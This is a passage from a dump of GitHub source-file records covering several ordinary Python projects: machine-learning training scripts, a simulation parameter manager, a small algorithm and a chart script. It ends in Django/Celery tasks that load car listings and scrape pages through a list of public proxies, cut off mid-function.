self.client.send_message(\"/avatar/parameters/\"+address, value)\r\n \r\nif __name__==\"__main__\":\r\n from PyQt5.QtWidgets import QApplication\r\n import sys\r\n app = QApplication(sys.argv)\r\n # listener = OSCListener()\r\n param_changer = AvatarParameterChanger()\r\n param_changer.temporary_change_parameters()\r\n # listener.serve_forever()\r\n app.exec_()\r\n \r\n ","repo_name":"Tw0Brainz/spotify-queue-ocr-monitor","sub_path":"vrc/osc_notifier.py","file_name":"osc_notifier.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8698517101","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 19:36:01 2020\n\n@author: OCAC\n\"\"\"\n\nlength=float(input(\"Enter length:\"))\nwidth=float(input(\"Enter width:\"))\narea=length*width\narea_acres=area/43560\nprint(\"The area of the field is:\",area_acres,\"acres\")","repo_name":"AnkitM18-tech/Python-Introductory-Problems","sub_path":"1.Introductory/FieldArea.py","file_name":"FieldArea.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73168926564","text":"import torch\nfrom torch import nn\nimport torchvision\n\nfrom models.modules import Resnet, TemporalConvNet\n\n\nclass ResNetLSTM(nn.Module):\n\n\tdef __init__(self, n_classes=600, resnet_layers=101, hidden_size=1024, layers=2):\n\t\tsuper(ResNetLSTM, self).__init__()\n\t\tself.cnn = Resnet(layers=resnet_layers, output_dims=512)\n\t\tself.lstm = nn.LSTM(\n\t\t\tinput_size = 512,\n\t\t\thidden_size = hidden_size,\n\t\t\tnum_layers = 2,\n\t\t\tbidirectional = True,\n\t\t)\n\t\tself.statesize = (layers*2, 1, hidden_size)\n\t\tself.outputsize = 2 * hidden_size\n\t\tself.state = self.init_state(self.statesize, None)\n\t\tself.temporal_pooling = \"mean\"\n\t\tself.fc = nn.Linear(self.outputsize, n_classes)\n\n\tdef forward(self, x):\n\t\tn, c, f, h, w = x.shape\n\t\tx = x.permute(0, 2, 1, 3, 4) # (n,c,f,h,w) -> (n,f,c,h,w)\n\t\tx = x.reshape(n*f, c, h, w)\n\t\tx = self.cnn(x)\n\t\tx = x.reshape(n, f, -1).permute(1, 0, 2)\n\t\tself.lstm.flatten_parameters()\n\t\toutput, _ = self.lstm(x, self.init_state(self.statesize, x.device))\n\t\tif self.temporal_pooling == \"mean\": output = torch.mean(output, dim=0)\n\t\telse: output = output[-1]\n\t\toutput = self.fc(output)\n\t\treturn output\n\n\tdef init_state(self, size, device):\n\t\treturn torch.zeros(size).to(device), torch.zeros(size).to(device)\n\nclass ResNetTCN(nn.Module):\n\n\tdef __init__(self, n_classes=600, resnet_layers=101, hidden_size=1024, layers=2):\n\t\tsuper(ResNetTCN, self).__init__()\n\t\tself.cnn = Resnet(layers=resnet_layers, output_dims=512)\n\t\tself.tcn = TemporalConvNet(512, [hidden_size]*layers)\n\t\tself.fc = nn.Linear(hidden_size, n_classes)\n\t\tself.temporal_pooling = \"mean\"\n\n\tdef forward(self, x):\n\t\tn, c, f, h, w = x.shape\n\t\tx = x.permute(0, 2, 1, 3, 4) # (n,c,f,h,w) -> (n,f,c,h,w)\n\t\tx = x.reshape(n*f, c, h, w)\n\t\tx = self.cnn(x)\n\t\tx = x.reshape(n, f, -1).permute(0, 2, 1)\n\t\toutput = self.tcn(x)\n\t\tif self.temporal_pooling == \"mean\": output = torch.mean(output, dim=2)\n\t\telse: output = output[:, :, -1]\n\t\toutput = self.fc(output)\n\t\treturn output\n","repo_name":"flixpar/ActivityRecognition","sub_path":"models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"17566395401","text":"import tensorflow as tf\nfrom transformers import TFGPT2LMHeadModel, GPT2Config \nfrom dataloader.load_data import read_gpt_tfrecord, read_ctx_tfrecord\nfrom dataloader.tfrecord_utils import load_from_gcs\nfrom glob import glob\nfrom config import *\nfrom google.cloud import storage\nfrom distribute.utils import setup_strategy\nfrom trainer.criterion import pad_masked_cce\n\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint\n\nstrategy, num_replica = setup_strategy()\nbatch_size = (BS // num_replica) * num_replica\nif num_replica == 1:\n batch_size = 1\n\ndef create_model(max_len=256):\n config = GPT2Config(**GPT_SMALL_CONFIG)\n input_ids = tf.keras.layers.Input(shape=(max_len,), dtype='int32')\n gpt = TFGPT2LMHeadModel(config)\n out = gpt(input_ids).logits\n model = tf.keras.Model(inputs=input_ids, outputs=out)\n if IS_LOAD:\n load_path = LOAD_PATH \n model.load_weights(load_path)\n print(f'loaded from {load_path}!!')\n # model = TFGPT2LMHeadModel(config)\n optimizer = tf.keras.optimizers.Adam(learning_rate=LR)\n model.compile(\n optimizer=optimizer,\n # loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n loss=pad_masked_cce\n )\n return model\n\nwith strategy.scope():\n model = create_model()\n\n\n# train_from = glob('data/everytime/*.tfrecord', recursive=True)\n# train_from = load_from_gcs('nlp-pololo', prefix=['gpt_tfrecord/everytime/'])\ntrain_from = load_from_gcs('nlp-pololo', prefix=['context_tfrecord/everytime/', 'context_tfrecord/aihub_sns', 'context_tfrecord/kakao'],\\\n sort_key=lambda path: 0 if 'everytime' in path else 1)\n# train_from = train_from[:1]\nprint(train_from)\n\n# dset = read_gpt_tfrecord(train_from).shuffle(buffer_size=20000)\ndset = read_ctx_tfrecord(train_from, with_mask=True).shuffle(buffer_size=20000)\ndset = dset.padded_batch(batch_size, padded_shapes=(MAX_SEQ_LEN, MAX_SEQ_LEN),\\\n padding_values=tf.constant(0, dtype=tf.int64), drop_remainder=True)\n\nskip_point = 1000 \ntrain_set, val_set = dset.skip(skip_point), dset.take(skip_point)\nprint('splitting train/val set..')\n\ntrain_set = strategy.experimental_distribute_dataset(train_set.repeat())\nval_set = strategy.experimental_distribute_dataset(val_set)\n\ntrain_steps = 2000000 // BS + 1\nval_steps = skip_point \n\n\ncallbacks = [\n # EarlyStopping(monitor='val_loss', patience=10), \n # ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=3, min_lr=_learning_rate * 0.05),\n ModelCheckpoint(f\"ckpts/best.h5\",\n monitor='val_loss', \n save_best_only=True,\n save_weights_only=True,\n mode='auto')\n # WandbCallback(),\n ]\n\n\nprint(f'train batch size={batch_size}, lr={LR}')\nmodel.fit(train_set,\n epochs=EPOCHS,\n steps_per_epoch=train_steps,\n callbacks=callbacks,\n validation_data=val_set,\n validation_steps=val_steps\n )","repo_name":"5yearsKim/EverytimeGPT","sub_path":"fit_gpt.py","file_name":"fit_gpt.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15860736339","text":"\"\"\"\nThe ParameterManager controls the handles importing \nthe parameters from the params.yaml file. These\nfunctions don't need to be accessed by the end user.\n\"\"\"\n\nimport __main__\nimport os\n\n### Get the name of program importing this package ###\nif hasattr(__main__,\"__file__\"):\n main_file = os.path.basename(__main__.__file__)\nelse:\n main_file = \"ipython\"\n \n### This checks if we are just doing documentation ###\nif main_file != \"sphinx-build\":\n import yaml\n import datetime\n import numpy as np\n from math import ceil\n import shutil\n from dolfin import *\n import sys\n import ast\n\n # set_log_level(LogLevel.CRITICAL)\n\n######################################################\n### Collect all options and define general options ###\n######################################################\n\n\n### THis is a special class that allows prints to go to file and terminal\nclass Logger(object):\n def __init__(self,filename):\n self.terminal = sys.stdout\n self.log = open(filename, \"a\")\n self.log.seek(0)\n self.log.truncate()\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message) \n\n def flush(self):\n self.terminal.flush()\n self.log.flush()\n pass \n\nclass Parameters(dict):\n \"\"\"\n Parameters is a subclass of pythons *dict* that adds\n function specific to windse.\n \"\"\"\n def __init__(self):\n super(Parameters, self).__init__()\n self.current_tab = 0\n\n def NestedUpdate(self,dic,keys,value):\n if len(keys) > 1:\n next_dic = dic.setdefault(keys[0],{})\n self.NestedUpdate(next_dic,keys[1:],value)\n elif len(keys) == 1:\n current_value = dic.get(keys[0],\"\")\n if isinstance(current_value,int):\n dic[keys[0]] = int(value)\n elif isinstance(current_value,float):\n dic[keys[0]] = float(value)\n elif isinstance(current_value,str):\n dic[keys[0]] = value\n elif isinstance(current_value,list):\n dic[keys[0]] = ast.literal_eval(value)\n\n\n def Load(self, loc,updated_parameters=[]):\n \"\"\"\n This function loads the parameters from the .yaml file. \n It should only be assessed once from the :meth:`windse.initialize` function.\n\n Args:\n loc (str): This string is the location of the .yaml parameters file.\n\n \"\"\"\n\n ### Load the yaml file (requires PyYaml)\n yaml_file = yaml.load(open(loc),Loader=yaml.SafeLoader)\n\n ### update any parameters if supplied ###\n for p in updated_parameters:\n keys_list = p.split(\":\")\n self.NestedUpdate(yaml_file,keys_list[:-1],keys_list[-1])\n\n ### Set the parameters\n self.update(yaml_file)\n\n ### Create Instances of the general options ###\n self.name = self[\"general\"].get(\"name\", \"Test\")\n self.preappend_datetime = self[\"general\"].get(\"preappend_datetime\", False)\n self.output_type = self[\"general\"].get(\"output_type\", \"pvd\")\n self.dolfin_adjoint = self[\"general\"].get(\"dolfin_adjoint\", False)\n self.output = self[\"general\"].get(\"output\", [\"solution\"])\n\n ### Print some stats ###\n\n ### Set up the folder Structure ###\n timestamp=datetime.datetime.today().strftime('%Y%m%d_%H%M%S')\n fancytimestamp=datetime.datetime.today().strftime('%Y/%m/%d_%H:%M:%S')\n if self.preappend_datetime:\n self.name = timestamp+\"-\"+self.name\n self[\"general\"][\"name\"]=self.name\n self.folder = \"output/\"+self.name+\"/\"\n self[\"general\"][\"folder\"] = self.folder\n\n ### Make sure folder exists ###\n if not os.path.exists(self.folder): os.makedirs(self.folder)\n if not os.path.exists(self.folder+\"input_files/\"): os.makedirs(self.folder+\"input_files/\")\n \n ### Setup the logger ###\n self.log = self.folder+\"log.txt\"\n sys.stdout = Logger(self.log)\n\n ### Copy params file to output folder ###\n shutil.copy(loc,self.folder+\"input_files/\")\n\n ### Create checkpoint if required ###\n # if self.save_file_type == \"hdf5\":\n # self.Hdf=HDF5File(MPI.mpi_comm(), self.folder+\"checkpoint/checkpoint.h5\", \"w\")\n\n ### Print some more stuff\n self.fprint(\"General Parameter Information\", special=\"header\")\n self.fprint(\"Run Name: {0}\".format(self.name))\n self.fprint(\"Run Time Stamp: {0}\".format(fancytimestamp))\n self.fprint(\"Output Folder: {0}\".format(self.folder))\n if updated_parameters:\n self.fprint(\"Updated Parameter:\")\n for i,p in enumerate(updated_parameters):\n self.fprint(\"{:d}: {:}\".format(i,p),offset=1)\n self.fprint(\"Parameters Setup\", special=\"footer\")\n\n def Read(self):\n \"\"\"\n This function reads the current state of the parameters object \n and prints it in a easy to read way.\n \"\"\"\n for group in self:\n print(group)\n max_length = 0\n for key in self[group]:\n max_length = max(max_length,len(key))\n max_length = max_length\n for key in self[group]:\n print(\" \"+key+\": \"+\" \"*(max_length-len(key))+repr(self[group][key]))\n\n def Save(self, func, filename, subfolder=\"\",val=0,file=None,filetype=\"default\"):\n \"\"\"\n This function is used to save the various dolfin.Functions created\n by windse. It should only be accessed internally.\n\n Args:\n func (dolfin.Function): The Function to be saved\n filename (str): the name of the function\n\n :Keyword Arguments:\n * **subfolder** (*str*): where to save the files within the output folder\n * **n** (*float*): used for saving a series of output. Use n=0 for the first save.\n\n \"\"\"\n self.fprint(\"Saving: {0}\".format(filename))\n\n # if not isinstance(init_func,Function):\n # func = Function(func)\n # else:\n # func = init_func\n\n ### Name the function in the meta data, This should probably be done at creation\n old_filename = func.name()\n func.rename(filename,filename)\n\n if filetype == \"default\":\n filetype = self.output_type\n\n if file is None:\n ### Make sure the folder exists\n if not os.path.exists(self.folder+subfolder): os.makedirs(self.folder+subfolder)\n\n if filetype == \"pvd\":\n file_string = self.folder+subfolder+filename+\".pvd\"\n out = File(file_string)\n out << (func,val)\n elif filetype == \"xdmf\":\n file_string = self.folder+subfolder+filename+\".xdmf\"\n out = XDMFFile(file_string)\n out.write(func,val)\n\n func.rename(old_filename,old_filename)\n return out\n\n else:\n if filetype == \"pvd\" or isinstance(func,type(Mesh)):\n file << (func,val)\n elif filetype == \"xdmf\":\n file.write(func,val)\n\n func.rename(old_filename,old_filename)\n return file\n\n def fprint(self,string,tab=None,offset=0,special=None):\n \"\"\"\n This is just a fancy print function that will tab according to where\n we are in the solve\n\n Args:\n string (str): the string for printing\n\n :Keyword Arguments:\n * **tab** (*int*): the tab level\n\n \"\"\"\n ### Check Processor ###\n rank = 0\n if rank == 0:\n ### Check if tab length has been overridden\n if tab is None:\n tab = self.current_tab\n \n ### Check if we are starting or ending a section\n if special==\"header\":\n self.current_tab += 1\n self.fprint(\"\",tab=tab)\n elif special ==\"footer\":\n self.current_tab -= 1\n tab -= 1\n self.fprint(\"\",tab=tab+1)\n\n ### Apply Offset if provided ###\n tab += offset\n\n ### Create Tabbed string ###\n tabbed = \"| \"*tab\n\n ### Apply Tabbed string ###\n if isinstance(string,str):\n string = tabbed+string\n else:\n string = tabbed+repr(string)\n\n ### Print ###\n # print(string, flush=True)\n print(string)\n sys.stdout.flush()\n\n if special==\"header\":\n self.fprint(\"\",tab=tab+1)\n\nwindse_parameters = Parameters()","repo_name":"michalehu/WindSE","sub_path":"windse/ParameterManager.py","file_name":"ParameterManager.py","file_ext":"py","file_size_in_byte":8609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"6644287930","text":"#!/usr/bin/python\n#coding:utf-8\n\n\"\"\"\n@author: wuxikun\n@software: PyCharm Community Edition\n@file: deep_learn_process.py\n@time: 12/21/18 3:31 PM\n\"\"\"\n\nimport os\nimport sys\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nsys.path.append(os.path.split(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))[0])\n\nimport pickle\nfrom src.datasets import Datesets\nfrom keras.layers import Embedding, Dense, LSTM, Dropout\nfrom keras.preprocessing import sequence\nfrom keras.models import Model, Sequential\nimport numpy as np\nimport keras.backend as K\nfrom keras.utils import np_utils\nimport tensorflow as tf\nimport keras.backend.tensorflow_backend as KTF\nfrom keras import regularizers, optimizers\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\" # 使用编号为1,2号的GPU\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.5 # 每个GPU现存上界控制在50%以内\nsession = tf.Session(config=config)\n\nKTF.set_session(session)\n\n(raw_datas, labels) = Datesets.load_data(\"in_hospital\")\nraw_datas = [list(set(data.split(' '))) for data in raw_datas]\n\nbatch_size = 32\nepochs = 50\n\ntrain_size = int(len(labels) * 0.8)\ntrain_x = raw_datas[:train_size]\ntrain_y = labels[:train_size]\ntest_x = raw_datas[train_size:]\ntest_y = labels[train_size:]\n\nw2id_path = '../data/word2id.pkl'\nmax_length = max([len(usr) for usr in train_x])\n# max_steps = max([len(_) for _ in train_x]) # 文书最多个数\n\n\nif not os.path.exists(w2id_path):\n words = set()\n for docs in train_x:\n for record in docs:\n record_list = record.split(' ')\n words = (words | set(record_list))\n word_indices = {v: i for i, v in enumerate(words)}\n pickle.dump(word_indices, open(w2id_path, 'wb+'))\nelse:\n word_indices = pickle.load(open(w2id_path, 'rb'))\n\n\ndef vecotr_list(sent_list, wordIndices):\n res = [word_indices[v] for v in sent_list if v in wordIndices]\n return res\n\ndef vector_sentence(sentence, wordIndices):\n sent_list = sentence.strip().split(' ')\n return vecotr_list(sent_list, wordIndices)\n\ntrain_x = [vecotr_list(doc, word_indices) for doc in train_x]\ntest_x = [vecotr_list(doc, word_indices) for doc in test_x]\ntrain_x = sequence.pad_sequences(train_x, max_length)\ntest_x = sequence.pad_sequences(test_x, max_length)\n\ntest_x = np.array(test_x)\ntest_y = np.array(test_y)\ntrain_x = np.array(train_x)\ntrain_y = np.array(train_y)\n\nprint(train_x[0].shape)\n\nmodel = Sequential()\nmodel.add(Embedding(len(word_indices), output_dim=128, name='embedding', dropout=0.4410))\nmodel.add(Dense(100))\nmodel.add(LSTM(279))\nmodel.add(Dense(20))\nmodel.add(Dense(1, activation='linear'))\n\nsgd = optimizers.SGD(lr=0.1, decay=1e-6, clipnorm=11.16,momentum=0.9, nesterov=True)\n\nmodel.compile(loss='mean_squared_error',\n optimizer=sgd,\n metrics=['accuracy'])\n\nmodel.fit(train_x, train_y, batch_size=batch_size, epochs=epochs, validation_data=(test_x, test_y))\nmodel.save('in_hospital.h5')\n","repo_name":"Alucardmini/ehr_paper","sub_path":"src/deep_learn_process.py","file_name":"deep_learn_process.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27546002186","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@File : jknet_trainer.py\n@Time : 2022/4/10 11:16 A.M.\n@Author : Jia Yiming\n\"\"\"\n\nimport os\n# os.environ['CUDA_VISIBLE_DEVICES']='0'\n# os.environ['TL_BACKEND'] = 'torch'\nimport argparse\nimport tensorlayerx as tlx\nfrom gammagl.datasets import Planetoid\nfrom gammagl.models import JKNet\nfrom tensorlayerx.model import TrainOneStep, WithLoss\nfrom gammagl.utils import add_self_loops, calc_gcn_norm, mask_to_index, set_device\n\nclass SemiSpvzLoss(WithLoss):\n def __init__(self, net, loss_fn):\n super(SemiSpvzLoss, self).__init__(backbone=net, loss_fn=loss_fn)\n\n def forward(self, data, y):\n logits = self.backbone_network(data['x'], data['edge_index'], data['edge_weight'], data['num_nodes'])\n train_logits = tlx.gather(logits, data['train_idx'])\n train_y = tlx.gather(data['y'], data['train_idx'])\n loss = self._loss_fn(train_logits, train_y)\n return loss\n\n\ndef calculate_acc(logits, y, metrics):\n \"\"\"\n Args:\n logits: node logits\n y: node labels\n metrics: tensorlayerx.metrics\n Returns:\n rst\n \"\"\"\n\n metrics.update(logits, y)\n rst = metrics.result()\n metrics.reset()\n return rst\n\ndef main(args):\n # load cora dataset\n # set_device(5)\n if str.lower(args.dataset) not in ['cora', 'pubmed', 'citeseer']:\n raise ValueError('Unknown dataset: {}'.format(args.dataset))\n dataset = Planetoid(args.dataset_path, args.dataset)\n dataset.process() # suggest to execute explicitly so far\n graph = dataset[0]\n\n edge_index, _ = add_self_loops(graph.edge_index, num_nodes=graph.num_nodes, n_loops=args.self_loops)\n edge_weight = tlx.convert_to_tensor(calc_gcn_norm(edge_index, graph.num_nodes))\n\n useful_node = 0\n useful_index = []\n useful_mask = []\n for i in range(graph.num_nodes):\n new = graph.train_mask[i] or graph.test_mask[i] or graph.val_mask[i]\n useful_mask.append(new)\n if new:\n useful_index.append(i)\n useful_node += 1\n useful_mask = tlx.convert_to_tensor(useful_mask)\n train_num = int(useful_node * 0.6)\n val_num = int(useful_node * 0.2)\n test_num = useful_node - train_num - val_num\n\n graph.train_mask = graph.train_mask.cpu().numpy()\n graph.val_mask = graph.val_mask.cpu().numpy()\n graph.test_mask = graph.test_mask.cpu().numpy()\n\n\n graph.train_mask[:] = False\n graph.train_mask[useful_index[:train_num]] = True\n graph.val_mask[:] = False\n graph.val_mask[useful_index[train_num:train_num + val_num]] = True\n graph.test_mask[:] = False\n graph.test_mask[useful_index[train_num + val_num:train_num + val_num + test_num]] = True\n\n graph.tensor()\n\n # for mindspore, it should be passed into node indices\n train_idx = mask_to_index(graph.train_mask)\n test_idx = mask_to_index(graph.test_mask)\n val_idx = mask_to_index(graph.val_mask)\n\n net = JKNet(dataset=dataset,\n mode=args.mode,\n num_layers=args.iter_K,\n drop=args.drop_rate)\n\n optimizer = tlx.optimizers.Adam(lr=args.lr, weight_decay=args.weight_decay)\n metrics = tlx.metrics.Accuracy()\n train_weights = net.trainable_weights\n\n loss_func = SemiSpvzLoss(net, tlx.losses.softmax_cross_entropy_with_logits)\n train_one_step = TrainOneStep(loss_func, optimizer, train_weights)\n\n data = {\n \"x\": graph.x,\n \"y\": graph.y,\n \"edge_index\": edge_index,\n \"edge_weight\": edge_weight,\n \"train_idx\": train_idx,\n \"test_idx\": test_idx,\n \"val_idx\": val_idx,\n \"num_nodes\": graph.num_nodes,\n }\n\n best_val_acc = 0\n for epoch in range(args.n_epoch):\n net.set_train()\n train_loss = train_one_step(data, graph.y)\n\n net.set_eval()\n logits = net(data['x'], data['edge_index'], data['edge_weight'], data['num_nodes'])\n val_logits = tlx.gather(logits, data['val_idx'])\n val_y = tlx.gather(data['y'], data['val_idx'])\n val_acc = calculate_acc(val_logits, val_y, metrics)\n\n print(\"Epoch [{:0>3d}] \".format(epoch + 1) \\\n + \" train loss: {:.4f}\".format(train_loss.item()) \\\n + \" val acc: {:.4f}\".format(val_acc))\n\n # save best model on evaluation set\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n net.save_weights(args.best_model_path + net.name + \".npz\", format='npz_dict')\n\n net.load_weights(args.best_model_path + net.name + \".npz\", format='npz_dict')\n if tlx.BACKEND == 'torch':\n net.to(data['x'].device)\n\n net.set_eval()\n logits = net(data['x'], data['edge_index'], data['edge_weight'], data['num_nodes'])\n test_logits = tlx.gather(logits, data['test_idx'])\n test_y = tlx.gather(data['y'], data['test_idx'])\n test_acc = calculate_acc(test_logits, test_y, metrics)\n print(\"Test acc: {:.4f}\".format(test_acc))\n\n\nif __name__ == '__main__':\n # parameters setting\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--lr\", type=float, default=0.01, help=\"learnin rate\")\n parser.add_argument(\"--weight_decay\", type=float, default=1e-3, help=\"Adam weight decay\")\n parser.add_argument(\"--n_epoch\", type=int, default=200, help=\"number of epoch\")\n parser.add_argument(\"--hidden_dim\", type=int, default=16, help=\"dimention of hidden layers\")\n parser.add_argument(\"--drop_rate\", type=float, default=0.5, help=\"drop rate\")\n parser.add_argument(\"--iter_K\", type=int, default=6, help=\"number K of iteration\")\n parser.add_argument(\"--l2_coef\", type=float, default=1e-3, help=\"l2 loss coeficient\")\n parser.add_argument('--dataset', type=str, default='cora', help='dataset')\n parser.add_argument(\"--dataset_path\", type=str, default=r'', help=\"path to save dataset\")\n parser.add_argument(\"--best_model_path\", type=str, default=r'./', help=\"path to save best model\")\n parser.add_argument(\"--self_loops\", type=int, default=1, help=\"number of graph self-loop\")\n parser.add_argument(\"--mode\", type=str, default='max', help=\"mode of jumping knowledge, optional=['max', 'cat', 'lstm']\")\n\n args = parser.parse_args()\n main(args)","repo_name":"BUPT-GAMMA/GammaGL","sub_path":"examples/jknet/jknet_trainer.py","file_name":"jknet_trainer.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"52"} +{"seq_id":"40362692798","text":"from random import randrange\n\nclass Solution:\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.find_kth_smallest(0, len(nums) - 1, nums, len(nums)+1-k)\n\n def find_kth_smallest(self, low, high, nums, k):\n if low == high:\n return nums[low]\n\n mid = self.partition(low, high, nums)\n if mid - low == k - 1:\n return nums[mid]\n elif mid - low > k - 1:\n return self.find_kth_smallest(low, mid-1, nums, k)\n else:\n return self.find_kth_smallest(mid+1, high, nums, k-(mid-low+1))\n\n def partition(self, low, high, nums):\n i = low - 1\n pivot = nums[high]\n\n for j in range(low, high):\n print(i)\n if nums[j] <= pivot:\n i += 1\n nums[i], nums[j] = nums[j], nums[i]\n nums[i+1], nums[high] = nums[high], nums[i+1]\n print(nums)\n return i + 1\n","repo_name":"steventhan/algo-review","sub_path":"quick_select.py","file_name":"quick_select.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35918549173","text":"# -*- coding: utf-8 -*-\nfrom redis import Redis\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n\n\nmatplotlib.matplotlib_fname()\nplt.rcParams['font.sans-serif'] = ['YaHei Consolas Hybrid']\nplt.rcParams['axes.unicode_minus'] = False\n\nr = Redis(host=\"localhost\", port=6379, db=2)\nword_tag = ['买卖交易', '求助', '校园生活', '学校新闻', '网络', '情感']\nword_tag = [word.decode('utf-8') for word in word_tag]\n\n\ndef get_every_type_max():\n hot = []\n for word in word_tag:\n temp = []\n for i in range(1, 5):\n if r.lrange(word + ':cluster:' + str(i), 0, -1):\n j = r.lrange(word + ':cluster:' + str(i), 0, -1)[0]\n print(j)\n temp.append(float(j.decode('utf-8')))\n hot.append(max(temp))\n print(hot)\n return hot\n\n\ndef show_histgoram(hot):\n number = int(len(hot))\n ind = np.arange(number)\n hot = tuple(hot)\n fig, axes = plt.subplots(1, 1)\n rects = axes.bar(ind, hot, width=0.35, color='yellow', align='center', yerr=0.00000001)\n x_label = tuple(word_tag)\n axes.set_ylabel(u'最大热度值')\n axes.set_title(u'聚类结果各类别的最大热度值')\n axes.set_xticks(ind)\n axes.set_xticklabels(x_label)\n axes.legend((rects,), (u'热度',))\n for rect in rects:\n height = rect.get_height()\n axes.text(rect.get_x() + rect.get_width() / 2, 1.03 * height,\n '%.2f' % float(height), ha='center', va='bottom')\n plt.savefig('hot.png')\n\n\nif __name__ == '__main__':\n hot = get_every_type_max()\n show_histgoram(hot)\n","repo_name":"guoweikuang/analyse_web","sub_path":"weibo_showing/app/python_analyse/product_picture.py","file_name":"product_picture.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14646222764","text":"from celery import shared_task\nfrom listing.models import Listing\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom random import shuffle\nfrom time import sleep\nimport sqlite3\nfrom random import choice,sample\nimport os\nfrom greenwood.settings import BASE_DIR\n\nPATH_TO_DB=os.path.join(BASE_DIR, 'Otomoto_cars.db')\n\n@shared_task()\ndef test_task():\n return \"Hi, I am workong\"\n\n\n\n\n@shared_task()\ndef select_listings_for_hp():\n all_marked=Listing.objects.filter(is_main=True)\n for l in all_marked:\n l.is_main=False\n print(f'cнял отметку {l.id}')\n l.save()\n\n all_entries = list(Listing.objects.all())\n random_items = sample(all_entries, 6)\n\n shuffle(all_entries)\n for l in random_items:\n l.is_main=True\n print(f'отметил {l.id}')\n l.save()\n\n\n return\n\n@shared_task()\ndef select_listings_for_catalog():\n Listing.objects.all().delete()\n cann = sqlite3.connect(PATH_TO_DB)\n cursor = cann.cursor()\n elements = cursor.execute(f\"\"\"SELECT * FROM Listings\"\"\")\n elements = elements.fetchall()\n cann.commit()\n shuffle(elements)\n for i in range(0, 50):\n print(elements[i])\n element=elements[i]\n title=element[-1]\n price=element[1]\n\n print(price)\n year=element[2]\n fuel=element[3]\n city=element[5]\n odometr=element[6]\n volume=element[8]\n listing_link=element[0]\n mark=element[10]\n model=element[11]\n image_url=element[-2]\n l = Listing(title=title,price=price,year=year,fuel=fuel,city=city,odometr=odometr,volume=volume,\n listing_link=listing_link,model=f'{mark} {model}',image_url=image_url)\n print (l.title)\n l.save()\n\n return\n\n\n\ndef parser(link): #request+text via proxies\n proxies = ['54.38.218.215:6582', '125.17.80.226:8080', '54.38.155.89:6582', '151.232.72.12:80', '151.232.72.18:80',\n '151.232.72.20:80', '151.232.72.16:80', '103.147.134.218:8080', '182.71.200.50:80', '151.232.72.15:80',\n '188.166.237.61:3128', '147.135.7.120:3128', '59.120.117.244:80', '163.172.29.94:3838',\n '104.244.99.186:80', '142.44.221.126:8080', '128.199.214.87:3128', '88.99.10.251:1080',\n '185.61.92.207:43947', '195.189.60.97:3128', '201.75.0.51:53281', '151.232.72.22:80',\n '45.137.216.118:80', '95.174.67.50:18080', '151.232.72.23:80', '151.232.72.14:80', '83.97.23.90:18080',\n '103.146.177.39:80', '165.22.64.68:36918', '165.22.81.30:39686', '88.99.10.254:1080', '167.71.5.83:3128',\n '169.57.1.84:8123', '161.202.226.194:80', '105.27.238.161:80', '78.47.16.54:80', '151.232.72.19:80',\n '64.71.145.122:3128', '54.38.219.100:6582', '191.96.42.80:8080', '157.230.103.91:38609',\n '173.192.128.238:25', '88.198.24.108:8080', '81.201.60.130:80', '80.48.119.28:8080', '159.8.114.37:8123',\n '37.120.192.154:8080', '163.172.213.218:3838', '162.144.106.245:3838', '85.238.104.235:47408',\n '43.248.24.158:51166', '173.212.202.65:80', '20.185.176.102:80', '13.209.155.88:8080',\n '213.230.107.125:3128', '202.40.188.94:40486', '113.254.85.88:8193', '52.157.97.234:80',\n '131.108.61.46:3128', '152.0.201.164:999', '103.57.70.248:52000', '162.144.36.187:3838',\n '119.82.253.123:36169', '85.10.219.97:1080', '183.87.153.98:49602', '144.76.214.154:1080',\n '203.202.245.58:80', '104.45.188.43:3128', '148.251.153.6:1080', '185.134.23.198:80',\n '85.10.219.103:1080', '191.232.170.36:80', '94.141.233.66:53171', '54.38.218.209:6582',\n '54.38.218.214:6582', '176.56.107.140:50177', '61.228.35.49:8080', '110.138.205.217:8080',\n '54.38.155.95:6582', '88.99.10.255:1080']\n s = requests.Session()\n s.proxies = choice(proxies)\n r = s.get(link)\n sleep(1)\n return r.text\n\n\ndef find_listings(txt): #here i can find html of listings on web-pages\n soup = BeautifulSoup(txt,'html.parser')\n listings=soup.find_all('article')\n return listings\n\n\ndef find_data(listing,mark): #finding key data in listing, data is not always exist\n lisitng_link=re.findall(\"\"\"href=\"(.+)\" title\"\"\",str(listing))[0]\n 